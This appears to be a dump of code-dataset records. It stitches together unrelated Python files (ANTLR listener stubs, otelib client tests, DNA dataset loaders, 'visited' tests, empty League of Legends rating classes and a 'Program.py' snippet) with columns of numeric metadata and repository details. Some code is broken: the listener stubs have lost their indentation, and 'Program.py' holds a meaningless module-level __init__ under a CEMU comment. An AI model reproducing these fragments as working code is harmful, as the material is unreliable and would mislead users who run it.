# Enter a parse tree produced by CSharp4Parser#method_invocation2.
def enterMethod_invocation2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_invocation2.
def exitMethod_invocation2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#object_creation_expression2.
def enterObject_creation_expression2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#object_creation_expression2.
def exitObject_creation_expression2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121OF.
def enterType121OF(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121OF.
def exitType121OF(self, ctx):
pass
| 29.387062 | 95 | 0.724136 | 12,996 | 108,115 | 5.842567 | 0.043552 | 0.064559 | 0.107599 | 0.193678 | 0.873133 | 0.85833 | 0.852456 | 0.851561 | 0.846964 | 0.778006 | 0 | 0.016712 | 0.22292 | 108,115 | 3,678 | 96 | 29.395052 | 0.887066 | 0.494594 | 0 | 0.499388 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.499388 | false | 0.499388 | 0.000612 | 0 | 0.500612 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 11 |
6b74b96071aef9bc9bd7d227abd26a8fb02521b8 | 44 | py | Python | flask_s3_viewer/aws/__init__.py | blairdrummond/flask-s3-viewer | e8ce36d4456da49c0b5642da3088d016e780ef83 | [
"MIT"
] | 7 | 2020-08-07T05:56:12.000Z | 2021-08-23T22:12:20.000Z | flask_s3_viewer/aws/__init__.py | blairdrummond/flask-s3-viewer | e8ce36d4456da49c0b5642da3088d016e780ef83 | [
"MIT"
] | 1 | 2021-09-07T03:41:44.000Z | 2021-09-07T03:41:44.000Z | flask_s3_viewer/aws/__init__.py | blairdrummond/flask-s3-viewer | e8ce36d4456da49c0b5642da3088d016e780ef83 | [
"MIT"
] | 2 | 2020-06-11T11:17:37.000Z | 2020-08-08T00:32:42.000Z | from . import ref, session
from . import s3
| 14.666667 | 26 | 0.727273 | 7 | 44 | 4.571429 | 0.714286 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028571 | 0.204545 | 44 | 2 | 27 | 22 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6baa6f6861e296ce39de7672e714f7beefb7b2d4 | 5,432 | py | Python | tests/strategies/test_mapping.py | EMMC-ASBL/otelib | a66001f3a8b94fc7a113d25f03ff04ba1e2fbf51 | [
"MIT"
] | 1 | 2022-01-24T15:18:14.000Z | 2022-01-24T15:18:14.000Z | tests/strategies/test_mapping.py | EMMC-ASBL/otelib | a66001f3a8b94fc7a113d25f03ff04ba1e2fbf51 | [
"MIT"
] | 34 | 2022-01-28T16:22:46.000Z | 2022-03-30T17:07:36.000Z | tests/strategies/test_mapping.py | EMMC-ASBL/otelib | a66001f3a8b94fc7a113d25f03ff04ba1e2fbf51 | [
"MIT"
] | null | null | null | """Tests for `otelib.strategies.mapping`."""
from typing import TYPE_CHECKING
import pytest
if TYPE_CHECKING:
from typing import Callable, Union
from tests.conftest import OTEResponse, ResourceType
def test_create(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Test `Mapping.create()`."""
from otelib.strategies.mapping import Mapping
mock_ote_response(
method="post",
endpoint="/mapping",
return_json={"mapping_id": ids("mapping")},
)
mapping = Mapping(server_url)
assert mapping.id is None
mapping.create(
mappingType="triples",
**testdata("mapping"),
)
assert mapping.id
def test_create_fails(
mock_ote_response: "OTEResponse",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Check `Mapping.create()` raises `ApiError` upon request failure."""
from otelib.exceptions import ApiError
from otelib.strategies.mapping import Mapping
mock_ote_response(
method="post",
endpoint="/mapping",
status_code=500,
return_content=b"Internal Server Error",
)
mapping = Mapping(server_url)
assert mapping.id is None
with pytest.raises(ApiError, match="APIError"):
# `session_id` has a wrong type, the request should fail.
mapping.create(
mappingType="triples",
**testdata("mapping"),
session_id=123,
)
assert mapping.id is None
def test_fetch(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Test `Mapping.fetch()`."""
import json
from otelib.strategies.mapping import Mapping
mock_ote_response(
method="post",
endpoint="/mapping",
return_json={"mapping_id": ids("mapping")},
)
mock_ote_response(
method="get",
endpoint=f"/mapping/{ids('mapping')}",
return_json={},
)
mapping = Mapping(server_url)
# We must first create the resource - getting a resource ID
mapping.create(
mappingType="triples",
**testdata("mapping"),
)
content = mapping.fetch(session_id=None)
assert json.loads(content) == {}
def test_fetch_fails(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Check `Mapping.fetch()` raises `ApiError` upon request failure."""
from otelib.exceptions import ApiError
from otelib.strategies.mapping import Mapping
mock_ote_response(
method="post",
endpoint="/mapping",
return_json={"mapping_id": ids("mapping")},
)
mock_ote_response(
method="get",
endpoint=f"/mapping/{ids('mapping')}",
status_code=500,
return_content=b"Internal Server Error",
)
mapping = Mapping(server_url)
# We must first create the resource - getting a resource ID
mapping.create(
mappingType="triples",
**testdata("mapping"),
)
with pytest.raises(ApiError, match="APIError"):
# `session_id` has a wrong type, the request should fail.
mapping.fetch(session_id=123)
def test_initialize(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Test `Mapping.fetch()`."""
import json
from otelib.strategies.mapping import Mapping
mock_ote_response(
method="post",
endpoint="/mapping",
return_json={"mapping_id": ids("mapping")},
)
mock_ote_response(
method="post",
endpoint=f"/mapping/{ids('mapping')}/initialize",
return_json=testdata("mapping"),
)
mapping = Mapping(server_url)
# We must first create the resource - getting a resource ID
mapping.create(
mappingType="triples",
**testdata("mapping"),
)
content = mapping.initialize(session_id=None)
assert json.loads(content) == testdata("mapping")
def test_initialize_fails(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Check `Mapping.fetch()` raises `ApiError` upon request failure."""
from otelib.exceptions import ApiError
from otelib.strategies.mapping import Mapping
mock_ote_response(
method="post",
endpoint="/mapping",
return_json={"mapping_id": ids("mapping")},
)
mock_ote_response(
method="post",
endpoint=f"/mapping/{ids('mapping')}/initialize",
status_code=500,
return_content=b"Internal Server Error",
)
mapping = Mapping(server_url)
# We must first create the resource - getting a resource ID
mapping.create(
mappingType="triples",
**testdata("mapping"),
)
with pytest.raises(ApiError, match="APIError"):
# `session_id` has a wrong type, the request should fail.
mapping.initialize(session_id=123)
| 25.622642 | 74 | 0.634573 | 597 | 5,432 | 5.638191 | 0.125628 | 0.033274 | 0.071301 | 0.091503 | 0.887106 | 0.869578 | 0.844326 | 0.823529 | 0.823529 | 0.804219 | 0 | 0.004322 | 0.233247 | 5,432 | 211 | 75 | 25.744076 | 0.803842 | 0.129786 | 0 | 0.75 | 0 | 0 | 0.213661 | 0.09413 | 0 | 0 | 0 | 0 | 0.040541 | 1 | 0.040541 | false | 0 | 0.101351 | 0 | 0.141892 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6bae49d7a47bab625f5efff882f8f846421bd2ef | 6,666 | py | Python | satori/datasets.py | jeffhsu3/satori | 4e43e57b7a3634ce257c55cd82082e6b531ca0bd | [
"MIT"
] | 5 | 2021-07-09T02:15:59.000Z | 2022-01-21T07:59:27.000Z | satori/datasets.py | jeffhsu3/satori | 4e43e57b7a3634ce257c55cd82082e6b531ca0bd | [
"MIT"
] | null | null | null | satori/datasets.py | jeffhsu3/satori | 4e43e57b7a3634ce257c55cd82082e6b531ca0bd | [
"MIT"
] | 1 | 2021-07-09T02:16:01.000Z | 2021-07-09T02:16:01.000Z | import numpy as np
import pandas as pd
import random
import torch
from fastprogress import progress_bar
from random import randint
from torch.utils.data import Dataset
class DatasetLoadAll(Dataset):
def __init__(self, df_path, num_labels=2, for_embeddings=False):
self.DNAalphabet = {'A':'0', 'C':'1', 'G':'2', 'T':'3'}
df_path = df_path.split('.')[0] #just in case the user provide extension
self.df_all = pd.read_csv(df_path+'.txt',delimiter='\t',header=None)
self.df_seq = pd.read_csv(df_path+'.fa',header=None)
strand = self.df_seq[0][0][-3:] #can be (+) or (.)
self.df_all['header'] = self.df_all.apply(lambda x: '>'+x[0]+':'+str(x[1])+'-'+str(x[2])+strand, axis=1)
self.chroms = self.df_all[0].unique()
self.df_seq_all = pd.concat([self.df_seq[::2].reset_index(drop=True), self.df_seq[1::2].reset_index(drop=True)], axis=1, sort=False)
self.df_seq_all.columns = ["header","sequence"]
#self.df_seq_all['chrom'] = self.df_seq_all['header'].apply(lambda x: x.strip('>').split(':')[0])
self.df_seq_all['sequence'].apply(lambda x: x.upper())
self.num_labels = num_labels
self.df = self.df_all
self.df_seq_final = self.df_seq_all
self.df = self.df.reset_index()
self.df_seq_final = self.df_seq_final.reset_index()
#self.df['header'] = self.df.apply(lambda x: '>'+x[0]+':'+str(x[1])+'-'+str(x[2])+'('+x[5]+')', axis=1)
if for_embeddings == False:
self.One_hot_Encoded_Tensors = []
self.Label_Tensors = []
self.Seqs = []
self.Header = []
for i in progress_bar(range(0,self.df.shape[0])): #tqdm() before
if self.num_labels == 2:
y = self.df[self.df.columns[-2]][i]
else:
y = np.asarray(self.df[self.df.columns[-2]][i].split(',')).astype(int)
y = self.one_hot_encode_labels(y)
header = self.df['header'][i]
self.Header.append(header)
X = self.df_seq_final['sequence'][self.df_seq_final['header']==header].array[0].upper()
#X = X.replace('N',list(self.DNAalphabet.keys())[randint(0,3)])
X = X.replace('N',list(self.DNAalphabet.keys())[random.choice([0,1,2,3])])
X = X.replace('S',list(self.DNAalphabet.keys())[random.choice([1,2])])
X = X.replace('W',list(self.DNAalphabet.keys())[random.choice([0,3])])
X = X.replace('K',list(self.DNAalphabet.keys())[random.choice([2,3])])
X = X.replace('Y',list(self.DNAalphabet.keys())[random.choice([1,3])])
X = X.replace('R',list(self.DNAalphabet.keys())[random.choice([0,2])])
X = X.replace('M',list(self.DNAalphabet.keys())[random.choice([0,1])])
self.Seqs.append(X)
X = self.one_hot_encode(X)
self.One_hot_Encoded_Tensors.append(torch.tensor(X))
self.Label_Tensors.append(torch.tensor(y))
def __len__(self):
return self.df.shape[0]
def get_all_data(self):
return self.df, self.df_seq_final
def get_all_chroms(self):
return self.chroms
def one_hot_encode(self,seq):
mapping = dict(zip("ACGT", range(4)))
seq2 = [mapping[i] for i in seq]
return np.eye(4)[seq2].T.astype(np.long)
def one_hot_encode_labels(self,y):
lbArr = np.zeros(self.num_labels)
lbArr[y] = 1
return lbArr.astype(np.long)
def __getitem__(self, idx):
return self.Header[idx],self.Seqs[idx],self.One_hot_Encoded_Tensors[idx],self.Label_Tensors[idx]
class DatasetLazyLoad(Dataset):
def __init__(self, df_path, num_labels=2):
self.DNAalphabet = {'A':'0', 'C':'1', 'G':'2', 'T':'3'}
df_path = df_path.split('.')[0] #just in case the user provide extension
self.df_all = pd.read_csv(df_path+'.txt',delimiter='\t',header=None)
self.df_seq = pd.read_csv(df_path+'.fa',header=None)
strand = self.df_seq[0][0][-3:] #can be (+) or (.)
self.df_all['header'] = self.df_all.apply(lambda x: '>'+x[0]+':'+str(x[1])+'-'+str(x[2])+strand, axis=1)
self.chroms = self.df_all[0].unique()
self.df_seq_all = pd.concat([self.df_seq[::2].reset_index(drop=True), self.df_seq[1::2].reset_index(drop=True)], axis=1, sort=False)
self.df_seq_all.columns = ["header","sequence"]
#self.df_seq_all['chrom'] = self.df_seq_all['header'].apply(lambda x: x.strip('>').split(':')[0])
self.df_seq_all['sequence'].apply(lambda x: x.upper())
self.num_labels = num_labels
self.df = self.df_all
self.df_seq_final = self.df_seq_all
self.df = self.df.reset_index()
self.df_seq_final = self.df_seq_final.reset_index()
#self.df['header'] = self.df.apply(lambda x: '>'+x[0]+':'+str(x[1])+'-'+str(x[2])+'('+x[5]+')', axis=1)
def __len__(self):
return self.df.shape[0]
def get_all_data(self):
return self.df, self.df_seq_final
def get_all_chroms(self):
return self.chroms
def one_hot_encode(self,seq):
mapping = dict(zip("ACGT", range(4)))
seq2 = [mapping[i] for i in seq]
return np.eye(4)[seq2].T.astype(np.long)
def one_hot_encode_labels(self,y):
lbArr = np.zeros(self.num_labels)
lbArr[y] = 1
return lbArr.astype(np.long)
def __getitem__(self, idx):
if self.num_labels == 2:
y = self.df[self.df.columns[-2]][idx]
else:
y = np.asarray(self.df[self.df.columns[-2]][idx].split(',')).astype(int)
y = self.one_hot_encode_labels(y)
header = self.df['header'][idx]
X = self.df_seq_final['sequence'][self.df_seq_final['header']==header].array[0].upper()
#X = X.replace('N',list(self.DNAalphabet.keys())[randint(0,3)])
X = X.replace('N',list(self.DNAalphabet.keys())[random.choice([0,1,2,3])])
X = X.replace('S',list(self.DNAalphabet.keys())[random.choice([1,2])])
X = X.replace('W',list(self.DNAalphabet.keys())[random.choice([0,3])])
X = X.replace('K',list(self.DNAalphabet.keys())[random.choice([2,3])])
X = X.replace('Y',list(self.DNAalphabet.keys())[random.choice([1,3])])
X = X.replace('R',list(self.DNAalphabet.keys())[random.choice([0,2])])
X = X.replace('M',list(self.DNAalphabet.keys())[random.choice([0,1])])
seq = X
X = self.one_hot_encode(X)
return header,seq,torch.tensor(X),torch.tensor(y) | 49.014706 | 140 | 0.581308 | 1,009 | 6,666 | 3.675917 | 0.123885 | 0.11162 | 0.077649 | 0.099218 | 0.869776 | 0.850364 | 0.850364 | 0.837962 | 0.837962 | 0.819628 | 0 | 0.020575 | 0.227123 | 6,666 | 136 | 141 | 49.014706 | 0.69934 | 0.09706 | 0 | 0.736842 | 0 | 0 | 0.02696 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122807 | false | 0 | 0.061404 | 0.061404 | 0.307018 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6bb1ab54f629179fff806e2aea1ae7f1d77e91b2 | 4,000 | py | Python | visited_test.py | factabulous/matgrindr | 6f5d6d20e34f9b13950d654cf70afdb2e46f5d1e | [
"Apache-2.0"
] | 1 | 2018-03-31T12:15:07.000Z | 2018-03-31T12:15:07.000Z | visited_test.py | factabulous/matgrindr | 6f5d6d20e34f9b13950d654cf70afdb2e46f5d1e | [
"Apache-2.0"
] | null | null | null | visited_test.py | factabulous/matgrindr | 6f5d6d20e34f9b13950d654cf70afdb2e46f5d1e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
import unittest
import visited
class VisitedTest(unittest.TestCase):
def test_visited_recently(self):
"""
Checks that the visited state is remembered and expires after time
"""
v = visited.Visited()
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 1000 )
self.assertTrue(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000))
self.assertFalse(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000 + 7 * 24 * 3600))
def test_visited_recently_with_respawn(self):
"""
Checks that the visited state is remembered and expires after time
"""
v = visited.Visited()
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0, 'respawn_days': 5 },
when = 1000 )
self.assertTrue(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000))
self.assertFalse(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000 + 5 * 24 * 3600))
def test_visited_recently_with_no_respawn(self):
"""
Checks that the visited state is remembered and we understand zero
periods
"""
v = visited.Visited()
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0, 'respawn_days': 0 },
when = 1000 )
self.assertFalse(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000))
def test_visited_case_sensitivity(self):
"""
Checks that the store is not case sensitve
"""
v = visited.Visited()
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 1000 )
self.assertTrue(v.is_visited({ 'system': 'SOL', 'body': 'EARTH', 'lat': 0, 'lon': 0 }, when=1000))
self.assertFalse(v.is_visited({ 'system': 'SOL', 'body': 'EARTH', 'lat': 0, 'lon': 0 }, when=1000 + 7 * 24 * 3600))
def test_visited_multiple_times(self):
v = visited.Visited()
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 1000 )
self.assertTrue(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000))
self.assertFalse(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000 + 7 * 24 * 3600))
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 3000 )
# Now should be using the new recorded visit at 3000 secs
self.assertTrue(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000 + 7 * 24 * 3600))
self.assertFalse(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=3000 + 7 * 24 * 3600))
def test_never_visited(self):
v = visited.Visited()
self.assertFalse(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000))
def test_save(self):
v = visited.Visited()
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 1000 )
self.assertTrue(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000))
self.assertNotEqual('[]', v.save(when=1000))
self.assertEqual('[]', v.save(when=1000 + 7 * 24 * 3600))
def test_is_dirty(self):
v = visited.Visited()
self.assertFalse(v.is_dirty())
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 1000 )
self.assertTrue(v.is_dirty())
v.save()
self.assertFalse(v.is_dirty())
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 1001 )
self.assertTrue(v.is_dirty())
if __name__ == '__main__':
unittest.main()
| 45.977011 | 123 | 0.53625 | 513 | 4,000 | 4.068226 | 0.146199 | 0.137039 | 0.168663 | 0.210829 | 0.83517 | 0.815525 | 0.815525 | 0.7839 | 0.765692 | 0.765692 | 0 | 0.066803 | 0.2665 | 4,000 | 86 | 124 | 46.511628 | 0.644513 | 0.08225 | 0 | 0.576271 | 0 | 0 | 0.158027 | 0 | 0 | 0 | 0 | 0 | 0.322034 | 1 | 0.135593 | false | 0 | 0.033898 | 0 | 0.186441 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6bf46c76ac4f6596f0235f6ecc938051452c91c6 | 5,993 | py | Python | loldib/getratings/models/NA/na_vi/na_vi_jng.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_vi/na_vi_jng.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_vi/na_vi_jng.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_Vi_Jng_Aatrox(Ratings):
pass
class NA_Vi_Jng_Ahri(Ratings):
pass
class NA_Vi_Jng_Akali(Ratings):
pass
class NA_Vi_Jng_Alistar(Ratings):
pass
class NA_Vi_Jng_Amumu(Ratings):
pass
class NA_Vi_Jng_Anivia(Ratings):
pass
class NA_Vi_Jng_Annie(Ratings):
pass
class NA_Vi_Jng_Ashe(Ratings):
pass
class NA_Vi_Jng_AurelionSol(Ratings):
pass
class NA_Vi_Jng_Azir(Ratings):
pass
class NA_Vi_Jng_Bard(Ratings):
pass
class NA_Vi_Jng_Blitzcrank(Ratings):
pass
class NA_Vi_Jng_Brand(Ratings):
pass
class NA_Vi_Jng_Braum(Ratings):
pass
class NA_Vi_Jng_Caitlyn(Ratings):
pass
class NA_Vi_Jng_Camille(Ratings):
pass
class NA_Vi_Jng_Cassiopeia(Ratings):
pass
class NA_Vi_Jng_Chogath(Ratings):
pass
class NA_Vi_Jng_Corki(Ratings):
pass
class NA_Vi_Jng_Darius(Ratings):
pass
class NA_Vi_Jng_Diana(Ratings):
pass
class NA_Vi_Jng_Draven(Ratings):
pass
class NA_Vi_Jng_DrMundo(Ratings):
pass
class NA_Vi_Jng_Ekko(Ratings):
pass
class NA_Vi_Jng_Elise(Ratings):
pass
class NA_Vi_Jng_Evelynn(Ratings):
pass
class NA_Vi_Jng_Ezreal(Ratings):
pass
class NA_Vi_Jng_Fiddlesticks(Ratings):
pass
class NA_Vi_Jng_Fiora(Ratings):
pass
class NA_Vi_Jng_Fizz(Ratings):
pass
class NA_Vi_Jng_Galio(Ratings):
pass
class NA_Vi_Jng_Gangplank(Ratings):
pass
class NA_Vi_Jng_Garen(Ratings):
pass
class NA_Vi_Jng_Gnar(Ratings):
pass
class NA_Vi_Jng_Gragas(Ratings):
pass
class NA_Vi_Jng_Graves(Ratings):
pass
class NA_Vi_Jng_Hecarim(Ratings):
pass
class NA_Vi_Jng_Heimerdinger(Ratings):
pass
class NA_Vi_Jng_Illaoi(Ratings):
pass
class NA_Vi_Jng_Irelia(Ratings):
pass
class NA_Vi_Jng_Ivern(Ratings):
pass
class NA_Vi_Jng_Janna(Ratings):
pass
class NA_Vi_Jng_JarvanIV(Ratings):
pass
class NA_Vi_Jng_Jax(Ratings):
pass
class NA_Vi_Jng_Jayce(Ratings):
pass
class NA_Vi_Jng_Jhin(Ratings):
pass
class NA_Vi_Jng_Jinx(Ratings):
pass
class NA_Vi_Jng_Kalista(Ratings):
pass
class NA_Vi_Jng_Karma(Ratings):
pass
class NA_Vi_Jng_Karthus(Ratings):
pass
class NA_Vi_Jng_Kassadin(Ratings):
pass
class NA_Vi_Jng_Katarina(Ratings):
pass
class NA_Vi_Jng_Kayle(Ratings):
pass
class NA_Vi_Jng_Kayn(Ratings):
pass
class NA_Vi_Jng_Kennen(Ratings):
pass
class NA_Vi_Jng_Khazix(Ratings):
pass
class NA_Vi_Jng_Kindred(Ratings):
pass
class NA_Vi_Jng_Kled(Ratings):
pass
class NA_Vi_Jng_KogMaw(Ratings):
pass
class NA_Vi_Jng_Leblanc(Ratings):
pass
class NA_Vi_Jng_LeeSin(Ratings):
pass
class NA_Vi_Jng_Leona(Ratings):
pass
class NA_Vi_Jng_Lissandra(Ratings):
pass
class NA_Vi_Jng_Lucian(Ratings):
pass
class NA_Vi_Jng_Lulu(Ratings):
pass
class NA_Vi_Jng_Lux(Ratings):
pass
class NA_Vi_Jng_Malphite(Ratings):
pass
class NA_Vi_Jng_Malzahar(Ratings):
pass
class NA_Vi_Jng_Maokai(Ratings):
pass
class NA_Vi_Jng_MasterYi(Ratings):
pass
class NA_Vi_Jng_MissFortune(Ratings):
pass
class NA_Vi_Jng_MonkeyKing(Ratings):
pass
class NA_Vi_Jng_Mordekaiser(Ratings):
pass
class NA_Vi_Jng_Morgana(Ratings):
pass
class NA_Vi_Jng_Nami(Ratings):
pass
class NA_Vi_Jng_Nasus(Ratings):
pass
class NA_Vi_Jng_Nautilus(Ratings):
pass
class NA_Vi_Jng_Nidalee(Ratings):
pass
class NA_Vi_Jng_Nocturne(Ratings):
pass
class NA_Vi_Jng_Nunu(Ratings):
pass
class NA_Vi_Jng_Olaf(Ratings):
pass
class NA_Vi_Jng_Orianna(Ratings):
pass
class NA_Vi_Jng_Ornn(Ratings):
pass
class NA_Vi_Jng_Pantheon(Ratings):
pass
class NA_Vi_Jng_Poppy(Ratings):
pass
class NA_Vi_Jng_Quinn(Ratings):
pass
class NA_Vi_Jng_Rakan(Ratings):
pass
class NA_Vi_Jng_Rammus(Ratings):
pass
class NA_Vi_Jng_RekSai(Ratings):
pass
class NA_Vi_Jng_Renekton(Ratings):
pass
class NA_Vi_Jng_Rengar(Ratings):
pass
class NA_Vi_Jng_Riven(Ratings):
pass
class NA_Vi_Jng_Rumble(Ratings):
pass
class NA_Vi_Jng_Ryze(Ratings):
pass
class NA_Vi_Jng_Sejuani(Ratings):
pass
class NA_Vi_Jng_Shaco(Ratings):
pass
class NA_Vi_Jng_Shen(Ratings):
pass
class NA_Vi_Jng_Shyvana(Ratings):
pass
class NA_Vi_Jng_Singed(Ratings):
pass
class NA_Vi_Jng_Sion(Ratings):
pass
class NA_Vi_Jng_Sivir(Ratings):
pass
class NA_Vi_Jng_Skarner(Ratings):
pass
class NA_Vi_Jng_Sona(Ratings):
pass
class NA_Vi_Jng_Soraka(Ratings):
pass
class NA_Vi_Jng_Swain(Ratings):
pass
class NA_Vi_Jng_Syndra(Ratings):
pass
class NA_Vi_Jng_TahmKench(Ratings):
pass
class NA_Vi_Jng_Taliyah(Ratings):
pass
class NA_Vi_Jng_Talon(Ratings):
pass
class NA_Vi_Jng_Taric(Ratings):
pass
class NA_Vi_Jng_Teemo(Ratings):
pass
class NA_Vi_Jng_Thresh(Ratings):
pass
class NA_Vi_Jng_Tristana(Ratings):
pass
class NA_Vi_Jng_Trundle(Ratings):
pass
class NA_Vi_Jng_Tryndamere(Ratings):
pass
class NA_Vi_Jng_TwistedFate(Ratings):
pass
class NA_Vi_Jng_Twitch(Ratings):
pass
class NA_Vi_Jng_Udyr(Ratings):
pass
class NA_Vi_Jng_Urgot(Ratings):
pass
class NA_Vi_Jng_Varus(Ratings):
pass
class NA_Vi_Jng_Vayne(Ratings):
pass
class NA_Vi_Jng_Veigar(Ratings):
pass
class NA_Vi_Jng_Velkoz(Ratings):
pass
class NA_Vi_Jng_Vi(Ratings):
pass
class NA_Vi_Jng_Viktor(Ratings):
pass
class NA_Vi_Jng_Vladimir(Ratings):
pass
class NA_Vi_Jng_Volibear(Ratings):
pass
class NA_Vi_Jng_Warwick(Ratings):
pass
class NA_Vi_Jng_Xayah(Ratings):
pass
class NA_Vi_Jng_Xerath(Ratings):
pass
class NA_Vi_Jng_XinZhao(Ratings):
pass
class NA_Vi_Jng_Yasuo(Ratings):
pass
class NA_Vi_Jng_Yorick(Ratings):
pass
class NA_Vi_Jng_Zac(Ratings):
pass
class NA_Vi_Jng_Zed(Ratings):
pass
class NA_Vi_Jng_Ziggs(Ratings):
pass
class NA_Vi_Jng_Zilean(Ratings):
pass
class NA_Vi_Jng_Zyra(Ratings):
pass
| 14.371703 | 46 | 0.745203 | 972 | 5,993 | 4.168724 | 0.151235 | 0.238401 | 0.306515 | 0.408687 | 0.777641 | 0.777641 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185383 | 5,993 | 416 | 47 | 14.40625 | 0.829988 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
d43124657c352249aac28a235159eb38450f5328 | 2,396 | py | Python | Program.py | FlamesLLC/CEMURosettav0 | 20a6c8ae80fb83fa21dbb57174321d861ac14039 | [
"MIT"
] | null | null | null | Program.py | FlamesLLC/CEMURosettav0 | 20a6c8ae80fb83fa21dbb57174321d861ac14039 | [
"MIT"
] | null | null | null | Program.py | FlamesLLC/CEMURosettav0 | 20a6c8ae80fb83fa21dbb57174321d861ac14039 | [
"MIT"
] | null | null | null | ## this uses cemu and cemuhook to run it in opengl mode
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
